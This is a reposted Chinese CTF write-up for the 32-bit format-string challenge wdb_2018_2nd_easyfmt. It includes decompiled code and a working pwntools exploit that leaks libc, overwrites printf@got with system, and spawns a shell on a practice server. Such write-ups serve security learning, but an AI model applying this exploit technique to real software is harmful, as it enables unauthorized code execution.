wdb_2018_2nd_easyfmt

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8047000)
1
2
3
4
5

32位只开了NX

这题get到一点小知识（看我exp就知道了

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char buf; // [esp+8h] [ebp-70h]
  unsigned int v4; // [esp+6Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  puts("Do you know repeater?");
  while ( 1 )
  {
    read(0, &buf, 0x64u);
    printf(&buf);
    putchar(10);
  }
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

程序很简单,格式化字符串漏洞，并且无限使用

没有system函数

思路

泄露libc，用libc@system改掉printf@got，然后输入/bin/sh

libc=ELF('libc-2.23_32.so')
#from pwn import*
#from Yapack import *
r,elf=rec("node4.buuoj.cn",29463,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')
#debug('b *0x80485ca')
#debug('b *$rebase(0x1373)')

pl=p32(elf.got['printf'])+b'%6$s'
sla(b'epeater?',pl)
leak = u32(r.recvuntil('\xf7')[-4:])-libc.sym['printf']
li(leak)
sys=system(leak)
pl=fmtstr_payload(6,{elf.got['printf']:sys})
sl(pl)
sl(b'/bin/sh\x00')

#debug()
ia()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

一开始看栈里面没有合适的libc泄露
在这里插入图片描述

，我们从栈上面写got，泄露libc

在这里插入图片描述

，我们从栈上面写got，泄露libc

这样我们就有libc，就可以写libc@system了
在这里插入图片描述

相关阅读:
MySQL基础
Selenium-介绍下其他骚操作
记一次MySQL数据迁移到SQLServer全过程
【嵌入式开源库】MultiTimer 的使用，一款可无限扩展的软件定时器
java计算机毕业设计化妆品销售网站源码+mysql数据库+系统+lw文档+部署
ubuntu从1804LTS升级至2004LTS
PG学习笔记（PostgreSQL）
【Odoo】Odoo16-性能优化提升
DEEC算法附Matlab代码
Cookie和Session的对比和总结 [JavaWeb][Servlet]

原文地址：https://blog.csdn.net/qq_62887641/article/details/133436526